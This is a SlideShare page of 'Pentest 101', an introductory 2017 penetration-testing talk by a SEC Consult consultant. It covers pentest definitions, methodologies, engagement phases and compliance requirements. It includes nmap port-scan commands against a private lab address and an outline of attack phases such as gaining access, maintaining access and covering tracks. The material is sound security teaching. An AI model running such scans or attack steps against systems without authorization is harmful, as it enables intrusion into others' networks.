Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Pentest 101 @ Mahanakorn Network Research Laboratory

685 vues

Publié le

Free event from Mahanakorn University of Technology (MUT)
June 19, 2017

Publié dans : Technologie
  • Identifiez-vous pour voir les commentaires

Pentest 101 @ Mahanakorn Network Research Laboratory

  1. 1. Version: [--VX.X--] Date: [--YYYY-MM-DD--] Author: [--Author--] Responsible: [--Responsible--] Confidentiality Class: [--Confidentiality Class--] Version: 1.0 Date: 2017-06-17 Author: P. Morimoto Responsible: P. Morimoto Confidentiality Class: Public Pentest 101
  2. 2. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Vienna (HQ) | AT Wiener Neustadt | AT Vilnius | LT Berlin| DE Montreal | CA Singapore | SG Moscow | RU Zurich | CH SEC Consult Offices SEC Consult Clients Bangkok | TH SEC Consult – Who we are Found in 2002 70+ Security Experts 400+ Security Audits per year Globally operating SEC Consult Vulnerability Lab Malaysia | MY Luxembourg | LU Linz | AT
  3. 3. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Advisor for information security Expert for the implementation of security processes and policies (ISO 27001, BS 25999, GSHB) Leading company for technical security audits Specialist for web application security according to ONR 17700 Independent of product manufacturers Our customers are public authorities, financial institutions and insurance companies in Central Europe Sectoral orientation (defence, public, finance, industry) SEC Consult – Who we are 3
  4. 4. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 4 ISO/IEC 27001 Certificate entire company within certification scope certified since 16.01.2008
  5. 5. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 5 SEC Consult Vulnerability Lab European leading research lab for the identification of vulnerabilities and the analysis of new technologies, products and applications (security advisories) Integral part of the education and the further training of the security experts at SEC Consult Early information of our customers due to SEC Consult security alerts Support of well-known manufacturers to enhance the security of their products Companies and organisations SEC Consult has released security advisories for (excerpt). For details see: http://www.sec-consult.com/72.html
  6. 6. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 6 Who am I ? (Professional) Pichaya Morimoto IT Security Consultant Certifications: • Offensive Security Certified Professional (OSCP) • GIAC Web Application Penetration Tester (GWAPT) • Certified Ethical Hacker (CEH) • CompTIA Security+ Published Security Advisories: • 2014 - Privilege Escalation in Snort pfSense Package - Wordpress TimThumb 2.8.13 WebShot RCE - HybridAuth install.php PHP RCE • 2015 - PHP MoAdmin 1.1.2 RCE - Schedule Facebook Posts 1.5.6 SQL Injection - Lime Survey Multiple Critical Vulnerabilities • 2016 - Yeager CMS Multiple Critical Vulnerabilities - ASUS DSL-N55U router Multiple Vulnerabilities - LINE platform Multiple Vulnerabilities • 2017 - Aruba AirWave 8.2.3 External Entity Injection
  7. 7. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 7 Who am I ? (Personal) Co-administrator of สอนแฮกเว็บแบบแมว ๆ *Former* CTF Player of Pwnladin Team Co-administrator of 2600 Thailand Security Addict http://thehackernews.com/2014/06/zero-day-timthumb-webshot-vulnerability.html
  8. 8. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 8 Who am I ? (Personal) OWASP Thailand Meeting 3/2014 Topic: SQL Injection 101 : It is not just about ' or '1'='1 OWASP Thailand Meeting 5/2015 Topic: SQLi + Secure Coding with Hands-on OWASP Thailand Meeting 7/2016 Topic: Security Misconfiguration OWASP Thailand Meeting 2/2017 Topic: OWASP Top Ten Proactive Controls 2016 ….
  9. 9. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 9 Who am I ? (Personal) • Bug Bounty hunter • Occasionally, kill bugs for free Metasploit modules: • exploit/multi/http/phpmoadmin_exec • exploit/unix/webapp/hybridauth_install _php_exec • auxiliary/admin/http/limesurvey_file_ download and a lot more private exploit research and developments : )
  10. 10. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Who am I ? (Personal) 10 Special Contributor in LINE Security Bug Bounty Program • https://bugbounty.linecorp.com/en/halloffame/ (2017) • https://bugbounty.linecorp.com/en/halloffame/2016/ (2016)
  11. 11. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 11 Today’s Objective 1. Introduction to Penetration Testing • What is Penetration Testing ? • Importance of Penetration Testing • Risk, Vulnerability and Exploit 2. Understand the difference between types of security testing • Vulnerability Assessment (VA) • Penetration Testing • Blackbox, whitebox and greybox 3. A quick glance at Penetration Testing methodologies • Public guidelines • Major activities in Penetration Testing phases • Pre-engagement • Engagement • Post-engagement 4. Basic steps for attacking a target system • Case studies
  12. 12. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 12 Notice The information provided in this presentation is collected from publicly available websites and online documents. SEC Consult have improved version of these methodologies but it cannot be presented here due to confidentiality of our business.
  13. 13. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 13 What is Penetration Testing? (also called Pentest) Penetration Testing “an authorized simulated attack on a computer system that looks for security weaknesses, potentially gaining access to the system's features and data.” https://en.wikipedia.org/wiki/Penetration_test Goal To increase the security of the system (= network, - application) being tested.
  14. 14. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 14 Attack on a Computer System! Gain access to restricted resources • Unauthorized access to restricted data • Cross-tenant data access between users • From application user to administrator • From application user to local OS user/administrator • Break into hosts in an internal network Identify security misconfigurations and insecure implementation • Insecure configuration of system services and applications • Bypass security constraints (login, OTP, access control, payment etc.) • Missing security patches Privacy You need to think like the bad guys.
  15. 15. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 15 OWASP Top 10 (WebApp) https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project (Release Candidate)
  16. 16. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 16 Pentest a Website: The Outcome Sample list of vulnerabilities: • SQL injection • Broken access control • Bypass OTP verification • User denial of service • Improper use of encryption • Stored cross-site scripting • XML external entity injection • Upload of arbitrary files • Remote code execution
  17. 17. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Vulnerability in Standard Software 17 http://www.securityweek.com/aruba-patches-vulnerabilities-airwave-product • Found during an internal audit • Managed to read credentials of all APs • Notified the vendor to fix security flaw • Helps protect thousand of users from cyber attacks
  18. 18. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 18 Risk, Vulnerability and Exploit Risk Vulnerability • SQL injection, cross-site scripting … • Missing function level access control • Insufficient network segmentation Exploit An attempt to verify the risk by attacking the identified vulnerability https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology
  19. 19. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 19 Sample Exploit Code << EternalBlue exploit Blind SQL injection exploit >>
  20. 20. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 20 Importance of Penetration Testing • Identify vulnerabilities and security misconfigurations • Measure the effectiveness of the existing security controls • Identify gaps in compliance (ISO 27001, PCI DSS etc.) • A requirement from customer, partner or company’s HQ PCI DSS v3.2, Requirement 11.3 Requirement 11.3.1: Conduct external penetration testing at least annually or after any significant change has occurred in organization’s environment Requirement 11.3.2: Conduct internal penetration testing at least annually or after any significant change has occurred in organization’s environment Requirement 11.3.3: Exploitable vulnerabilities identified during testing shall be corrected and testing shall be repeated to verify corrections Requirement 11.3.4: Perform network segmentation testing to validate if segmentation controls and methods are effective and operational
  21. 21. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 21 Who should conduct Pentest for your system? Someone within the company that uses the system • IT support, network / system engineer • Programmer, software tester Hire IT security specialist into the company • Security engineer • Penetration tester External security consultant firms • Penetration tester • SEC Consult (。◕‿◕。) PCI DSS Penetration Testing Guidance: Qualified internal resources or a qualified third party may perform the penetration test as long as they are organizationally independent. This means the penetration tester must be organizationally separate from the management of the target systems.
  22. 22. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 22 My Experience on Security Certificates
  23. 23. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 23 Checkpoint #1 ü What is Penetration Testing? (also called Pentest) ü Attack on a Computer System! ü OWASP Top 10 (WebApp) ü Pentest a Website: The Outcome ü Vulnerability in Standard Software ü Risk, Vulnerability and Exploit ü Sample Exploit Code ü Importance of Penetration Testing ü Who should conduct Pentest for your system? ü My Experience on Security Certificates
  24. 24. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 24 I want a Pentest https://twitter.com/coffeetocode/status/794593057282859008
  25. 25. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 25 Vulnerability Assessment (VA) Network VA scanners • Nexpose • Nessus • Qualys WebApp VA scanners • Acunetix • IBM AppScan • HP WebInspect
  26. 26. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 26 Types of Penetration Testing Blackbox Pentest • IP in the scope Greybox Pentest • App user, VPN user • User manual Whitebox Pentest • Source code • SSH and/or RDP access • Network diagram • Detailed documents
  27. 27. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 27 Blackbox Pentest in Action Hack Me Please.
  28. 28. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 28 Methodologies and Standards • OWASP Testing Guide *** • Open Source Security Testing Methodology Manual (OSSTMM) • Penetration Testing Execution Standard (PTES) • PCI DSS Penetration Testing Guidance *** • NIST Guideline on Network Security Testing (special publ. 800-42) • NIST SP800-115 : Technical Guide to Information Security Testing and Assessment (NIST Special Publication 800-115) • OWASP Top Ten (Wep App / Mobile App) *** • CWE/SANS Top 25 Most dangerous software errors *** • Durchfuehrungskonzept fuer Penetrationstests (BSI - Germany) • ÖNORM A 7700 (standard for webapp security in Austria)
  29. 29. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 29 Checkpoint #2 ü I want a Pentest ü Vulnerability Assessment (VA) ü Types of Penetration Testing ü Blackbox Pentest in Action ü Methodologies and Standards
  30. 30. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 30 Activities in a Penetration Testing Project 1) Pre-engagement 2) Engagement 3) Post-engagement • Schedule • Scoping • Rules of engagement • Formal permission • Contract points • Penetration Testing • Reporting • Remediation • Retesting identified vulnerabilities • Cleaning up the Environment
  31. 31. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 31 Pre-engagement: The Boring Stuff • Scoping • Success Criteria • Target systems • Documentation • User credentials • Network diagram • Formal permission to attack • Identified vulnerabilities in the past • Rules of engagement • Schedule, time window • Method of communication • Contact points • Disable IPS, WAF? • How to handle sensitive data? • Systems that may have issues with security scanners? • List of all IP addresses from which testing will originate?
  32. 32. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 32 Engagement: The Five Phases of Hacking 1. Reconnaissance • Passive info. gathering 2. Scanning • Active info. gathering • Host discovery • Port scan • VA scan 3. Gaining Access • Exploit the vulnerability 4. Maintaining Access 5. Covering Tracks
  33. 33. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 33 Engagement: Reconnaissance (Passive) Passive information gathering: • The information obtained from the customer • Open source intelligence (OSINT) • Company websites • Search engine (Google, Bing) • Social media (Facebook, Twitter, Linkedin) • Qualification in recruitment sites (jobsdb) • Software vendor • Web footer, HTML comments, credit in CSS/JS files • Metadata from publicly available files • DOC, XLT, PDF, JPG • Email, email headers • Physical locations, list of employees • The customer in news
  34. 34. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 34 Engagement: Reconnaissance (Passive)
  35. 35. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 35 Engagement: Reconnaissance (Passive)
  36. 36. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 36 Engagement: Scanning (Active) Automated tools or manual: • Interact with the system • Host discovery (nmap) • Port scan (nmap) • Network sniffing (Wireshark) • Social engineering (phone call, phishing email) • Vulnerability scan (Nessus, Nexpose) On-site information gathering: • Physical security inspections • Wireless scanning • Accessible facilities • Dumpster driving • Types of equipment in use
  37. 37. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 37 Engagement: Scanning (Active) $ sudo nmap 192.168.99.101 $ sudo nmap -Pn -n -p 1-65535 192.168.99.101 --open -sV -O
  38. 38. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 38 Engagement: Scanning (Active)
  39. 39. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 39 Engagement: Scanning (Active)
  40. 40. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 40 Checkpoint #3 ü Activities in a Penetration Testing Project ü Pre-engagement: The Boring Stuff ü Engagement: The Five Phases of Hacking ü Engagement: Reconnaissance (Passive) ü Google ü Shodan ü Engagement: Scanning (Active) ü Nmap ü Nessus [… To be continued…] • Engagement: Gaining Access • Post-engagement: …
  41. 41. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 41 Engagement: Gaining Access (Sample Vulnerabilities) Attack application layer Attack network layer • SQL injection • Insecure data storage • Broken authentication • Broken session management • Lack of network segmentation • Missing ARP spoofing detection • Missing SYN flood attack detection • Weak wireless encryption
  42. 42. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 42 Engagement: Exploitation Check all the open ports - UDP/TCP
  43. 43. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 43 Engagement: Exploitation (OWASP Testing Guide) Google: ”OWASP Testing Guide”
  44. 44. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 44 Engagement: Post-exploitation • Privilege Escalation • Pivoting https://www.exploit-db.com/exploits/39719/
  45. 45. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 45 Post-engagement: The Boring stuff #2 • Reporting • Remediation • Retesting identified vulnerabilities • Cleaning up the Environment
